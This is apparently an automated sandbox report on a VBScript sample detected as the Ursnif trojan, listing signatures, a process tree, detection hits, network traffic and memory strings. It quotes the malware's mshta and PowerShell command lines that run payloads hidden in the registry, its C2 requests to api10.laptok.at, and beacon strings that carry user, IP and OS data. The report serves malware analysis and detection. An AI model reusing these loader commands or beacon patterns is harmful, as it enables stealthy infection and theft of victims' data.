Loading ...

Play interactive tourEdit tour

Analysis Report my_presentation_96642.vbs

Overview

General Information

Sample Name:my_presentation_96642.vbs
Analysis ID:286676
MD5:2e44ef40fba0da489e9c15ff7c64692c
SHA1:2b28439329860c37a6f73e9560c717e4f3962a4f
SHA256:bfd79682733c250d046f4174c4b5eb8df75f1132d7e6ac2aa0b5c4ad95419ab6

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Creates a thread in another existing process (thread injection)
Creates processes via WMI
Deletes itself after installation
Found Tor onion address
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 6884 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\my_presentation_96642.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 6052 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 1220 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:9474 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6596 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:3740956 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 4256 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75030 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5408 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75038 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 6868 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5940 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 3612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6804 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4108 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES235.tmp' 'c:\Users\user\AppData\Local\Temp\CSC37C4AB5BD67C482EA05BF33DBF5C85DE.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6584 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\x0s3qhtp.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3672 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES12CF.tmp' 'c:\Users\user\AppData\Local\Temp\CSCF573EE57D69F4661A05CCF421E73DB.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3508 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • control.exe (PID: 3596 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000003.579535833.00000000052A8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000006.00000003.579647192.00000000052A8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000006.00000003.646154649.0000000002800000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000006.00000003.579582589.00000000052A8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 12 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Dot net compiler compiles file from suspicious locationShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5940, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline', ProcessId: 6804
            Sigma detected: MSHTA Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6868, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 5940
            Sigma detected: Suspicious Csc.exe Source File FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5940, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline', ProcessId: 6804

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for domain / URLShow sources
            Source: api10.laptok.atVirustotal: Detection: 7%Perma Link
            Multi AV Scanner detection for submitted fileShow sources
            Source: my_presentation_96642.vbsVirustotal: Detection: 14%Perma Link
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\Temp
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.ini
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local

            Networking:

            barindex
            Found Tor onion addressShow sources
            Source: explorer.exe, 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: control.exe, 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: global trafficHTTP traffic detected: GET /api1/zeKdvS5_2Fn9oM_2F/coexB5hfv5Xq/BKUHttHYtNW/us6FE9_2B_2B06/DIA0XeFh6yzS1LY6s1oCH/O6I0fMOtxB_2FaMK/P_2FmFM_2F8ypR7/dx9hXoLcsTTkQCtqPt/jQT_2FP3D/Vu_2Br5n_2F72Y040sm_/2BshdGM4o4B1uUiNO_2/F9Br33BkXML4fx8yq9Jct6/kljeBXeVRXyBC/jH9YPFqS/oW_2BnptlSOO3fjce7eFLQs/cjY_2B3b6K/0jP5qluzKD5UfBlPH/Yyy63TkrNQlk/H6h_0A_0DaA/_2FxxiWhza0HQw/PJfj9KaKc_2Fqn7RK3nQF/t9F36pLVv5/WExF HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/xTmMAvfM8U78kER_2F7EJnC/bkGInMvNpG/6BP8y1_2BixUNH8Ya/1_2BJ2jwUqv1/PwAIg5Ci1Fp/NLUjkZDJX0Lhz0/_2B3Sl0fwWX3wVqK9fb0z/7prGaa1jNih_2FOl/e3_2BA_2FKyguNE/6gpQxTR29SWNVBzUiX/ooUjtYHSM/WJ2P7LXY0oqriYCDuUO5/6JGdRDFUFc7agHutM4Y/a7EEiaV_2B0Drpu7We2Elq/RNdw4UnphUm43/8yKUJrxx/MzdqD4aHhzJD6hXinP_2B_2/F_0A_0D_2F/yCrsh4eR2L6X7FBWv/KfYirZe4p8lP/b6dEfEFP0Hl/t0eFrlqKA0UbT2/NIFmqja4/0WX_2BS HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/Ux95d5jvhDWgBFPIM/ok4wfBCrkY7o/rzRFNM5ZLlT/J64_2FA7bIXm0V/Azl4bbI6xGQ8EFIKznixG/GIj81mj5k3B7TX2D/fTUrCzDV3sDdRNL/bMPSf9FVeacVj6Vh6g/21pfsCJp2/EOpd_2B8C24lKh5Q2hDj/jl4XV9jmwt81YjEedHm/Tvg4EvsmItvP2bpxHHYerN/GLMMgTJoYNBZD/lWpad5rU/ln_2FWDRI9hu_2B3EPbvwjD/xVOTspfDX3/s2TnvfY8e1XD_0A_0/D9Osa1XJDU3_/2BhSFJPYg7H/ypXm94knvghV5F/1R2_2FzWrhbikgq4I9drg/0B61m_2Bo/Km_2FnHXX/v HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
            Source: msapplication.xml1.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x21e87356,0x01d68cbc</date><accdate>0x21e87356,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml1.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x21e87356,0x01d68cbc</date><accdate>0x21e87356,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml6.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x21ed3819,0x01d68cbc</date><accdate>0x21ed3819,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml6.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x21ed3819,0x01d68cbc</date><accdate>0x21ed3819,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml8.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x21ef9a54,0x01d68cbc</date><accdate>0x21ef9a54,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml8.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x21ef9a54,0x01d68cbc</date><accdate>0x21ef9a54,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: api10.laptok.at
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 16 Sep 2020 21:30:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: explorer.exe, 00000024.00000000.653677419.0000000005840000.00000002.00000001.sdmpString found in binary or memory: http://%s.com
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
            Source: explorer.exe, 00000024.00000000.642401117.0000000000E60000.00000002.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/Ux95d5jvhDWgBFPIM/ok4wfBCrkY7o/rzRFNM5ZLlT/J64_2FA7bIXm0V/Azl4bbI6x
            Source: {4B9FB8EA-F8AF-11EA-90E2-ECF4BB862DED}.dat.19.dr, ~DFED50CD2992DAC186.TMP.19.drString found in binary or memory: http://api10.laptok.at/api1/Ux95d5jvhDWgBFPIM/ok4wfBCrkY7o/rzRFNM5ZLlT/J64_2FA7bIXm0V/Azl4bbI6xGQ8EF
            Source: {4B9FB8E8-F8AF-11EA-90E2-ECF4BB862DED}.dat.19.dr, ~DFEC43E79FA2AE0F5E.TMP.19.drString found in binary or memory: http://api10.laptok.at/api1/xTmMAvfM8U78kER_2F7EJnC/bkGInMvNpG/6BP8y1_2BixUNH8Ya/1_2BJ2jwUqv1/PwAIg5
            Source: {4B9FB8E6-F8AF-11EA-90E2-ECF4BB862DED}.dat.19.dr, ~DFFF962DDB9C468E8F.TMP.19.drString found in binary or memory: http://api10.laptok.at/api1/zeKdvS5_2Fn9oM_2F/coexB5hfv5Xq/BKUHttHYtNW/us6FE9_2B_2B06/DIA0XeFh6yzS1L
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
            Source: explorer.exe, 00000024.00000000.653677419.0000000005840000.00000002.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
            Source: explorer.exe, 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, control.exe, 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
            Source: explorer.exe, 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, control.exe, 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
            Source: explorer.exe, 00000024.00000000.662624699.000000000E2C2000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
            Source: explorer.exe, 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, control.exe, 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
